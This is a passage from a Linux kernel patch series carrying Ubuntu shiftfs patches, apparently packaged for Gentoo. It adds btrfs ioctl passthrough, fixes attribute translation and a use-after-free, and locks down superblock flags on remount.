-+ */ -+ err = -EPERM; - if (path.dentry->d_sb->s_magic != SHIFTFS_MAGIC) -- goto out_put; -- mp_ssi = path.dentry->d_sb->s_fs_info; -- if (!mp_ssi->mark) -- goto out_put; -- ssi->mnt = mntget(mp_ssi->mnt); -+ goto out_put_path; -+ -+ sbinfo_mp = path.dentry->d_sb->s_fs_info; -+ if (!sbinfo_mp->mark) -+ goto out_put_path; -+ -+ if (!passthrough_is_subset(sbinfo_mp->passthrough, -+ sbinfo->passthrough)) -+ goto out_put_path; -+ -+ sbinfo->mnt = mntget(sbinfo_mp->mnt); -+ sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred); - dentry = dget(path.dentry->d_fsdata); -- path_put(&path); -+ sbinfo->info_mark = sbinfo_mp; -+ } -+ -+ sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1; -+ if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) { -+ printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n"); -+ err = -EINVAL; -+ goto out_put_path; -+ } -+ -+ inode = new_inode(sb); -+ if (!inode) { -+ err = -ENOMEM; -+ goto out_put_path; - } -- ssi->userns = get_user_ns(dentry->d_sb->s_user_ns); -- sb->s_fs_info = ssi; -+ shiftfs_fill_inode(inode, dentry->d_inode->i_ino, S_IFDIR, 0, dentry); -+ -+ ihold(dentry->d_inode); -+ inode->i_private = dentry->d_inode; -+ - sb->s_magic = SHIFTFS_MAGIC; - sb->s_op = &shiftfs_super_ops; - sb->s_xattr = shiftfs_xattr_handlers; - sb->s_d_op = &shiftfs_dentry_ops; -- sb->s_root = d_make_root(shiftfs_new_inode(sb, S_IFDIR, dentry)); -+ sb->s_flags |= SB_POSIXACL; -+ sb->s_root = d_make_root(inode); -+ if (!sb->s_root) { -+ err = -ENOMEM; -+ goto out_put_path; -+ } -+ - sb->s_root->d_fsdata = dentry; -+ sbinfo->userns = get_user_ns(dentry->d_sb->s_user_ns); -+ shiftfs_copyattr(dentry->d_inode, sb->s_root->d_inode); - -- return 0; -+ dentry = NULL; -+ err = 0; - -- out_put: -+out_put_path: - path_put(&path); -- out: -+ -+out_free_name: - kfree(name); -- kfree(ssi); -+ -+ dput(dentry); -+ - return err; - } - -@@ -764,17 +1869,26 @@ static struct file_system_type shiftfs_type = { - - static int __init shiftfs_init(void) - { -+ 
shiftfs_file_info_cache = kmem_cache_create( -+ "shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0, -+ SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL); -+ if (!shiftfs_file_info_cache) -+ return -ENOMEM; -+ - return register_filesystem(&shiftfs_type); - } - - static void __exit shiftfs_exit(void) - { - unregister_filesystem(&shiftfs_type); -+ kmem_cache_destroy(shiftfs_file_info_cache); - } - - MODULE_ALIAS_FS("shiftfs"); - MODULE_AUTHOR("James Bottomley"); --MODULE_DESCRIPTION("uid/gid shifting bind filesystem"); -+MODULE_AUTHOR("Seth Forshee <seth.forshee@canonical.com>"); -+MODULE_AUTHOR("Christian Brauner <christian.brauner@ubuntu.com>"); -+MODULE_DESCRIPTION("id shifting filesystem"); - MODULE_LICENSE("GPL v2"); - module_init(shiftfs_init) - module_exit(shiftfs_exit) --- -2.39.2 - -From a2e0843dcd21746dfc23df95ab8c93af942fac6b Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian@brauner.io> -Date: Thu, 4 Apr 2019 15:39:13 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support some btrfs ioctls -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1823186 - -Shiftfs currently only passes through a few ioctl()s to the underlay. These -are ioctl()s that are generally considered safe. Doing it for random -ioctl()s would be a security issue. Permissions for ioctl()s are not -checked before the filesystem gets involved so if we were to override -credentials we e.g. could do a btrfs tree search in the underlay which we -normally wouldn't be allowed to do. -However, the btrfs filesystem allows unprivileged users to perform various -operations through its ioctl() interface. With shiftfs these ioctl() are -currently not working. To not regress users that expect btrfs ioctl()s to -work in unprivileged containers we can create a whitelist of ioctl()s that -we allow to go through to the underlay and for which we also switch -credentials. -The main problem is how we switch credentials. 
Since permission checks for -ioctl()s are -done by the actual file system and not by the vfs this would mean that any -additional capable(<cap>)-based checks done by the filesystem would -unconditionally pass after we switch credentials. So to make credential -switching safe we drop *all* capabilities when switching credentials. This -means that only inode-based permission checks will pass. - -Btrfs also allows unprivileged users to delete snapshots when the -filesystem is mounted with user_subvol_rm_allowed mount option or if the -caller is capable(CAP_SYS_ADMIN). The latter should never be the case -with unprivileged users. To make sure we only allow removal of snapshots in -the former case we drop all capabilities (see above) when switching -credentials. - -Additionally, btrfs allows the creation of snapshots. To make this work we -need to be (too) clever. When doing snapshots btrfs requires that an fd to -the directory the snapshot is supposed to be created in be passed along. -This fd obviously references a shiftfs file and as such a shiftfs dentry -and inode. This will cause btrfs to yell EXDEV. To circumvent this -problem we need to silently temporarily replace the passed-in fd with an fd -that refers to a file that references a btrfs dentry and inode. 
- -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Acked-by: Tyler Hicks <tyhicks@canonical.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 156 +++++++++++++++++++++++++++++++++++++++++++++++++-- - 1 file changed, 151 insertions(+), 5 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index ad1ae5bce6c1..678cad30f4a5 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1,6 +1,8 @@ -+#include <linux/btrfs.h> - #include <linux/capability.h> - #include <linux/cred.h> - #include <linux/mount.h> -+#include <linux/fdtable.h> - #include <linux/file.h> - #include <linux/fs.h> - #include <linux/namei.h> -@@ -41,7 +43,21 @@ static void shiftfs_fill_inode(struct inode *inode, unsigned long ino, - - #define SHIFTFS_PASSTHROUGH_NONE 0 - #define SHIFTFS_PASSTHROUGH_STAT 1 --#define SHIFTFS_PASSTHROUGH_ALL (SHIFTFS_PASSTHROUGH_STAT) -+#define SHIFTFS_PASSTHROUGH_IOCTL 2 -+#define SHIFTFS_PASSTHROUGH_ALL \ -+ (SHIFTFS_PASSTHROUGH_STAT | SHIFTFS_PASSTHROUGH_IOCTL) -+ -+static inline bool shiftfs_passthrough_ioctls(struct shiftfs_super_info *info) -+{ -+ if (!(info->passthrough & SHIFTFS_PASSTHROUGH_IOCTL)) -+ return false; -+ -+ if (info->info_mark && -+ !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_IOCTL)) -+ return false; -+ -+ return true; -+} - - static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info) - { -@@ -1345,18 +1361,120 @@ static inline void shiftfs_revert_ioctl_creds(const struct cred *oldcred, - return shiftfs_revert_object_creds(oldcred, newcred); - } - -+static inline bool is_btrfs_snap_ioctl(int cmd) -+{ -+ if ((cmd == BTRFS_IOC_SNAP_CREATE) || (cmd == BTRFS_IOC_SNAP_CREATE_V2)) -+ return true; -+ -+ return false; -+} -+ -+static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd, -+ void __user *arg, -+ struct btrfs_ioctl_vol_args *v1, -+ struct btrfs_ioctl_vol_args_v2 *v2) -+{ -+ int ret; -+ -+ if 
(!is_btrfs_snap_ioctl(cmd)) -+ return 0; -+ -+ if (cmd == BTRFS_IOC_SNAP_CREATE) -+ ret = copy_to_user(arg, v1, sizeof(*v1)); -+ else -+ ret = copy_to_user(arg, v2, sizeof(*v2)); -+ -+ fdput(lfd); -+ __close_fd(current->files, fd); -+ kfree(v1); -+ kfree(v2); -+ -+ return ret; -+} -+ -+static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg, -+ struct btrfs_ioctl_vol_args **b1, -+ struct btrfs_ioctl_vol_args_v2 **b2, -+ struct fd *lfd, -+ int *newfd) -+{ -+ int oldfd, ret; -+ struct fd src; -+ struct btrfs_ioctl_vol_args *v1 = NULL; -+ struct btrfs_ioctl_vol_args_v2 *v2 = NULL; -+ -+ if (!is_btrfs_snap_ioctl(cmd)) -+ return 0; -+ -+ if (cmd == BTRFS_IOC_SNAP_CREATE) { -+ v1 = memdup_user(arg, sizeof(*v1)); -+ if (IS_ERR(v1)) -+ return PTR_ERR(v1); -+ oldfd = v1->fd; -+ *b1 = v1; -+ } else { -+ v2 = memdup_user(arg, sizeof(*v2)); -+ if (IS_ERR(v2)) -+ return PTR_ERR(v2); -+ oldfd = v2->fd; -+ *b2 = v2; -+ } -+ -+ src = fdget(oldfd); -+ if (!src.file) -+ return -EINVAL; -+ -+ ret = shiftfs_real_fdget(src.file, lfd); -+ fdput(src); -+ if (ret) -+ return ret; -+ -+ *newfd = get_unused_fd_flags(lfd->file->f_flags); -+ if (*newfd < 0) { -+ fdput(*lfd); -+ return *newfd; -+ } -+ -+ fd_install(*newfd, lfd->file); -+ -+ if (cmd == BTRFS_IOC_SNAP_CREATE) { -+ v1->fd = *newfd; -+ ret = copy_to_user(arg, v1, sizeof(*v1)); -+ v1->fd = oldfd; -+ } else { -+ v2->fd = *newfd; -+ ret = copy_to_user(arg, v2, sizeof(*v2)); -+ v2->fd = oldfd; -+ } -+ -+ if (ret) -+ shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2); -+ -+ return ret; -+} -+ - static long shiftfs_real_ioctl(struct file *file, unsigned int cmd, - unsigned long arg) - { -- long ret = 0; - struct fd lowerfd; - struct cred *newcred; - const struct cred *oldcred; -+ int newfd = -EBADF; -+ long err = 0, ret = 0; -+ void __user *argp = (void __user *)arg; -+ struct fd btrfs_lfd = {}; - struct super_block *sb = file->f_path.dentry->d_sb; -+ struct btrfs_ioctl_vol_args *btrfs_v1 = NULL; -+ struct 
btrfs_ioctl_vol_args_v2 *btrfs_v2 = NULL; -+ -+ ret = shiftfs_btrfs_ioctl_fd_replace(cmd, argp, &btrfs_v1, &btrfs_v2, -+ &btrfs_lfd, &newfd); -+ if (ret < 0) -+ return ret; - - ret = shiftfs_real_fdget(file, &lowerfd); - if (ret) -- return ret; -+ goto out_restore; - - ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred); - if (ret) -@@ -1372,9 +1490,33 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd, - out_fdput: - fdput(lowerfd); - -+out_restore: -+ err = shiftfs_btrfs_ioctl_fd_restore(cmd, btrfs_lfd, newfd, argp, -+ btrfs_v1, btrfs_v2); -+ if (!ret) -+ ret = err; -+ - return ret; - } - -+static bool in_ioctl_whitelist(int flag) -+{ -+ switch (flag) { -+ case BTRFS_IOC_SNAP_CREATE: -+ return true; -+ case BTRFS_IOC_SNAP_CREATE_V2: -+ return true; -+ case BTRFS_IOC_SUBVOL_CREATE: -+ return true; -+ case BTRFS_IOC_SUBVOL_CREATE_V2: -+ return true; -+ case BTRFS_IOC_SNAP_DESTROY: -+ return true; -+ } -+ -+ return false; -+} -+ - static long shiftfs_ioctl(struct file *file, unsigned int cmd, - unsigned long arg) - { -@@ -1386,7 +1528,9 @@ static long shiftfs_ioctl(struct file *file, unsigned int cmd, - case FS_IOC_SETFLAGS: - break; - default: -- return -ENOTTY; -+ if (!in_ioctl_whitelist(cmd) || -+ !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info)) -+ return -ENOTTY; - } - - return shiftfs_real_ioctl(file, cmd, arg); -@@ -1403,7 +1547,9 @@ static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd, - case FS_IOC32_SETFLAGS: - break; - default: -- return -ENOIOCTLCMD; -+ if (!in_ioctl_whitelist(cmd) || -+ !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info)) -+ return -ENOIOCTLCMD; - } - - return shiftfs_real_ioctl(file, cmd, arg); --- -2.39.2 - -From 7e64c9484f2524943cde1164852c1888312c010f Mon Sep 17 00:00:00 2001 -From: Seth Forshee <seth.forshee@canonical.com> -Date: Thu, 11 Apr 2019 07:31:04 -0500 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: use translated ids when chaning lower - fs attrs -Cc: 
mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1824350 - -shiftfs_setattr() is preparing a new set of attributes with the -owner translated for the lower fs, but it then passes the -original attrs. As a result the owner is set to the untranslated -owner, which causes the shiftfs inodes to also have incorrect -ids. For example: - - # mkdir dir - # touch file - # ls -lh dir file - drwxr-xr-x 2 root root 4.0K Apr 11 13:05 dir - -rw-r--r-- 1 root root 0 Apr 11 13:05 file - # chown 500:500 dir file - # ls -lh dir file - drwxr-xr-x 2 1000500 1000500 4.0K Apr 11 12:42 dir - -rw-r--r-- 1 1000500 1000500 0 Apr 11 12:42 file - -Fix this to pass the correct iattr struct to notify_change(). - -Reviewed-by: Christian Brauner <christian.brauner@ubuntu.com> -Acked-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com> -Acked-by: Tyler Hicks <tyhicks@canonical.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 2 +- - 1 file changed, 1 insertion(+), 1 deletion(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 678cad30f4a5..e736fd6afcb4 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -779,7 +779,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr) - - inode_lock(loweri); - oldcred = shiftfs_override_creds(dentry->d_sb); -- err = notify_change(lowerd, attr, NULL); -+ err = notify_change(lowerd, &newattr, NULL); - revert_creds(oldcred); - inode_unlock(loweri); - --- -2.39.2 - -From 84e09374dce45b2aaec7e719acd209b1e5e4ae85 Mon Sep 17 00:00:00 2001 -From: Seth Forshee <seth.forshee@canonical.com> -Date: Sat, 13 Apr 2019 14:41:01 -0500 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix passing of attrs to underaly for - setattr -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1824717 - -shiftfs_setattr() makes a copy of the attrs it was passed to pass -to the lower fs. 
It then calls setattr_prepare() with the original -attrs, and this may make changes which are not reflected in the -attrs passed to the lower fs. To fix this, copy the attrs to the -new struct for the lower fs after calling setattr_prepare(). - -Additionally, notify_change() may have set ATTR_MODE when one of -ATTR_KILL_S[UG]ID is set, and passing this combination to -notify_change() will trigger a BUG(). Do as overlayfs and -ecryptfs both do, and clear ATTR_MODE if either of those bits -is set. - -Reviewed-by: Christian Brauner <christian.brauner@ubuntu.com> -Acked-by: Marcelo Henrique Cerri <marcelo.cerri@canonical.com> -Acked-by: Brad Figg <brad.figg@canonical.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 10 +++++++++- - 1 file changed, 9 insertions(+), 1 deletion(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index e736fd6afcb4..8e064756ea0c 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -765,7 +765,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr) - { - struct dentry *lowerd = dentry->d_fsdata; - struct inode *loweri = lowerd->d_inode; -- struct iattr newattr = *attr; -+ struct iattr newattr; - const struct cred *oldcred; - struct super_block *sb = dentry->d_sb; - int err; -@@ -774,9 +774,17 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr) - if (err) - return err; - -+ newattr = *attr; - newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid)); - newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid)); - -+ /* -+ * mode change is for clearing setuid/setgid bits. Allow lower fs -+ * to interpret this in its own way. 
-+ */ -+ if (newattr.ia_valid & (ATTR_KILL_SUID|ATTR_KILL_SGID)) -+ newattr.ia_valid &= ~ATTR_MODE; -+ - inode_lock(loweri); - oldcred = shiftfs_override_creds(dentry->d_sb); - err = notify_change(lowerd, &newattr, NULL); --- -2.39.2 - -From a3ba10b3019139566fa65c351966ca3482c90819 Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian@brauner.io> -Date: Mon, 15 Apr 2019 15:21:55 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent use-after-free when verifying - mount options -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1824735 - -Copy up the passthrough mount settings of the mark mount point to the -shiftfs overlay. - -Before this commit we used to keep a reference to the shiftfs mark -mount's shiftfs_super_info which was stashed in the superblock of the -mark mount. The problem is that we only take a reference to the mount of -the underlay, i.e. the filesystem that is *under* the shiftfs mark -mount. This means when someone performs a shiftfs mark mount, then a -shiftfs overlay mount and then immediately unmounts the shiftfs mark -mount we muck with invalid memory since shiftfs_put_super might have -already been called freeing that memory. - -Another solution would be to start reference counting. But this would be -overkill. We only care about the passthrough mount option of the mark -mount. And we only need it to verify that on remount the new passthrough -options of the shiftfs overlay are a subset of the mark mount's -passthrough options. In other scenarios we don't care. So copying up is -good enough and also only needs to happen once on mount, i.e. when a new -superblock is created and the .fill_super method is called. 
- -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Acked-by: Seth Forshee <seth.forshee@canonical.com> -Acked-by: Stefan Bader <stefan.bader@canonical.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 29 ++++++++++++++++++----------- - 1 file changed, 18 insertions(+), 11 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 8e064756ea0c..4c8a6ec2a617 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -28,7 +28,7 @@ struct shiftfs_super_info { - const struct cred *creator_cred; - bool mark; - unsigned int passthrough; -- struct shiftfs_super_info *info_mark; -+ unsigned int passthrough_mark; - }; - - struct shiftfs_file_info { -@@ -52,10 +52,6 @@ static inline bool shiftfs_passthrough_ioctls(struct shiftfs_super_info *info) - if (!(info->passthrough & SHIFTFS_PASSTHROUGH_IOCTL)) - return false; - -- if (info->info_mark && -- !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_IOCTL)) -- return false; -- - return true; - } - -@@ -64,10 +60,6 @@ static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info) - if (!(info->passthrough & SHIFTFS_PASSTHROUGH_STAT)) - return false; - -- if (info->info_mark && -- !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_STAT)) -- return false; -- - return true; - } - -@@ -1824,7 +1816,7 @@ static int shiftfs_remount(struct super_block *sb, int *flags, char *data) - - if (info->passthrough != new.passthrough) { - /* Don't allow exceeding passthrough options of mark mount. */ -- if (!passthrough_is_subset(info->info_mark->passthrough, -+ if (!passthrough_is_subset(info->passthrough_mark, - info->passthrough)) - return -EPERM; - -@@ -1926,9 +1918,19 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data, - - sbinfo->mnt = mntget(sbinfo_mp->mnt); - dentry = dget(path.dentry->d_fsdata); -+ /* -+ * Copy up the passthrough mount options from the -+ * parent mark mountpoint. 
-+ */ -+ sbinfo->passthrough_mark = sbinfo_mp->passthrough_mark; - } else { - sbinfo->mnt = mntget(path.mnt); - dentry = dget(path.dentry); -+ /* -+ * For a new mark passthrough_mark and passthrough -+ * are identical. -+ */ -+ sbinfo->passthrough_mark = sbinfo->passthrough; - } - - sbinfo->creator_cred = prepare_creds(); -@@ -1956,7 +1958,12 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data, - sbinfo->mnt = mntget(sbinfo_mp->mnt); - sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred); - dentry = dget(path.dentry->d_fsdata); -- sbinfo->info_mark = sbinfo_mp; -+ /* -+ * Copy up passthrough settings from mark mountpoint so we can -+ * verify when the overlay wants to remount with different -+ * passthrough settings. -+ */ -+ sbinfo->passthrough_mark = sbinfo_mp->passthrough; - } - - sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1; --- -2.39.2 - -From a6ec1bf679d71f552f3eee7bf2b5458a6ea71e9a Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian@brauner.io> -Date: Tue, 16 Apr 2019 18:29:00 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: use separate llseek method for - directories -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1824812 - -Give shiftfs it's own proper llseek method for directories. - -Before this commit we used to rely on an llseek method that was -targeted for regular files for both directories and regular files. -However, the realfile's f_pos was not correctly handled when userspace -called lseek(2) on a shiftfs directory file. Give directories their -own llseek operation so that seeking on a directory file is properly -supported. 
- -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Acked-by: Seth Forshee <seth.forshee@canonical.com> -Acked-by: Tyler Hicks <tyhicks@canonical.com> -Acked-by: Stefan Bader <stefan.bader@canonical.com> -Signed-off-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 14 +++++++++++--- - 1 file changed, 11 insertions(+), 3 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 4c8a6ec2a617..9771165d1ce0 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1144,7 +1144,15 @@ static int shiftfs_release(struct inode *inode, struct file *file) - return 0; - } - --static loff_t shiftfs_llseek(struct file *file, loff_t offset, int whence) -+static loff_t shiftfs_dir_llseek(struct file *file, loff_t offset, int whence) -+{ -+ struct shiftfs_file_info *file_info = file->private_data; -+ struct file *realfile = file_info->realfile; -+ -+ return vfs_llseek(realfile, offset, whence); -+} -+ -+static loff_t shiftfs_file_llseek(struct file *file, loff_t offset, int whence) - { - struct inode *realinode = file_inode(file)->i_private; - -@@ -1653,7 +1661,7 @@ static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx) - const struct file_operations shiftfs_file_operations = { - .open = shiftfs_open, - .release = shiftfs_release, -- .llseek = shiftfs_llseek, -+ .llseek = shiftfs_file_llseek, - .read_iter = shiftfs_read_iter, - .write_iter = shiftfs_write_iter, - .fsync = shiftfs_fsync, -@@ -1670,7 +1678,7 @@ const struct file_operations shiftfs_dir_operations = { - .compat_ioctl = shiftfs_compat_ioctl, - .fsync = shiftfs_fsync, - .iterate_shared = shiftfs_iterate_shared, -- .llseek = shiftfs_llseek, -+ .llseek = shiftfs_dir_llseek, - .open = shiftfs_open, - .read = generic_read_dir, - .release = shiftfs_release, --- -2.39.2 - -From 10c6312a5c1cd2fbbbcb47adf7597e8cb2e18391 Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian@brauner.io> -Date: Wed, 8 May 
2019 14:13:14 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: lock down certain superblock flags -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1827122 - -This locks down various superblock flags to prevent userns-root from -remounting a superblock with less restrictive options than the original -mark or underlay mount. - -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 47 ++++++++++++++++++++++++++++++++++++++++++++++- - 1 file changed, 46 insertions(+), 1 deletion(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 9771165d1ce0..a1dae7ea593b 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1808,6 +1808,33 @@ static inline bool passthrough_is_subset(int old_flags, int new_flags) - return true; - } - -+static int shiftfs_super_check_flags(unsigned long old_flags, -+ unsigned long new_flags) -+{ -+ if ((old_flags & SB_RDONLY) && !(new_flags & SB_RDONLY)) -+ return -EPERM; -+ -+ if ((old_flags & SB_NOSUID) && !(new_flags & SB_NOSUID)) -+ return -EPERM; -+ -+ if ((old_flags & SB_NODEV) && !(new_flags & SB_NODEV)) -+ return -EPERM; -+ -+ if ((old_flags & SB_NOEXEC) && !(new_flags & SB_NOEXEC)) -+ return -EPERM; -+ -+ if ((old_flags & SB_NOATIME) && !(new_flags & SB_NOATIME)) -+ return -EPERM; -+ -+ if ((old_flags & SB_NODIRATIME) && !(new_flags & SB_NODIRATIME)) -+ return -EPERM; -+ -+ if (!(old_flags & SB_POSIXACL) && (new_flags & SB_POSIXACL)) -+ return -EPERM; -+ -+ return 0; -+} -+ - static int shiftfs_remount(struct super_block *sb, int *flags, char *data) - { - int err; -@@ -1818,6 +1845,10 @@ static int shiftfs_remount(struct super_block *sb, int *flags, char *data) - if (err) - return err; - -+ err = shiftfs_super_check_flags(sb->s_flags, *flags); -+ if (err) -+ return err; -+ - /* Mark mount option cannot be changed. 
*/ - if (info->mark || (info->mark != new.mark)) - return -EPERM; -@@ -1847,6 +1878,16 @@ struct shiftfs_data { - const char *path; - }; - -+static void shiftfs_super_force_flags(struct super_block *sb, -+ unsigned long lower_flags) -+{ -+ sb->s_flags |= lower_flags & (SB_RDONLY | SB_NOSUID | SB_NODEV | -+ SB_NOEXEC | SB_NOATIME | SB_NODIRATIME); -+ -+ if (!(lower_flags & SB_POSIXACL)) -+ sb->s_flags &= ~SB_POSIXACL; -+} -+ - static int shiftfs_fill_super(struct super_block *sb, void *raw_data, - int silent) - { -@@ -1888,6 +1929,8 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data, - goto out_put_path; - } - -+ sb->s_flags |= SB_POSIXACL; -+ - if (sbinfo->mark) { - struct super_block *lower_sb = path.mnt->mnt_sb; - -@@ -1904,6 +1947,8 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data, - */ - sb->s_iflags = SB_I_NOEXEC; - -+ shiftfs_super_force_flags(sb, lower_sb->s_flags); -+ - /* - * Handle nesting of shiftfs mounts by referring this mark - * mount back to the original mark mount. This is more -@@ -1972,6 +2017,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data, - * passthrough settings. 
- */ - sbinfo->passthrough_mark = sbinfo_mp->passthrough; -+ shiftfs_super_force_flags(sb, path.mnt->mnt_sb->s_flags); - } - - sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1; -@@ -1995,7 +2041,6 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data, - sb->s_op = &shiftfs_super_ops; - sb->s_xattr = shiftfs_xattr_handlers; - sb->s_d_op = &shiftfs_dentry_ops; -- sb->s_flags |= SB_POSIXACL; - sb->s_root = d_make_root(inode); - if (!sb->s_root) { - err = -ENOMEM; --- -2.39.2 - -From 650ec55632c03c03e6cc5b08a764609b4b0eb192 Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian@brauner.io> -Date: Tue, 11 Jun 2019 11:47:35 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: allow changing ro/rw for subvolumes -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1832316 - -This enables toggling between ro/rw for btrfs subvolumes under shiftfs. - -Currently, btrfs workloads employing shiftfs cause regression. -With btrfs unprivileged users can already toggle whether a subvolume -will be ro or rw. This is broken on current shiftfs as we haven't -whitelisted these ioctls(). -To prevent such regression, we need to whitelist the ioctls -BTRFS_IOC_FS_INFO, BTRFS_IOC_SUBVOL_GETFLAGS, and -BTRFS_IOC_SUBVOL_SETFLAGS. All of them should be safe for unprivileged -users. 
- -Cc: Seth Forshee <seth.forshee@canonical.com> -Cc: Tyler Hicks <tyhicks@canonical.com> -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 21 ++++++++++++++++++--- - 1 file changed, 18 insertions(+), 3 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index a1dae7ea593b..49f6714e9f95 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1507,9 +1507,14 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd, - return ret; - } - --static bool in_ioctl_whitelist(int flag) -+static bool in_ioctl_whitelist(int flag, unsigned long arg) - { -+ void __user *argp = (void __user *)arg; -+ u64 flags = 0; -+ - switch (flag) { -+ case BTRFS_IOC_FS_INFO: -+ return true; - case BTRFS_IOC_SNAP_CREATE: - return true; - case BTRFS_IOC_SNAP_CREATE_V2: -@@ -1517,6 +1522,16 @@ static bool in_ioctl_whitelist(int flag) - case BTRFS_IOC_SUBVOL_CREATE: - return true; - case BTRFS_IOC_SUBVOL_CREATE_V2: -+ return true; -+ case BTRFS_IOC_SUBVOL_GETFLAGS: -+ return true; -+ case BTRFS_IOC_SUBVOL_SETFLAGS: -+ if (copy_from_user(&flags, arg, sizeof(flags))) -+ return false; -+ -+ if (flags & ~BTRFS_SUBVOL_RDONLY) -+ return false; -+ - return true; - case BTRFS_IOC_SNAP_DESTROY: - return true; -@@ -1536,7 +1551,7 @@ static long shiftfs_ioctl(struct file *file, unsigned int cmd, - case FS_IOC_SETFLAGS: - break; - default: -- if (!in_ioctl_whitelist(cmd) || -+ if (!in_ioctl_whitelist(cmd, arg) || - !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info)) - return -ENOTTY; - } -@@ -1555,7 +1570,7 @@ static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd, - case FS_IOC32_SETFLAGS: - break; - default: -- if (!in_ioctl_whitelist(cmd) || -+ if (!in_ioctl_whitelist(cmd, arg) || - 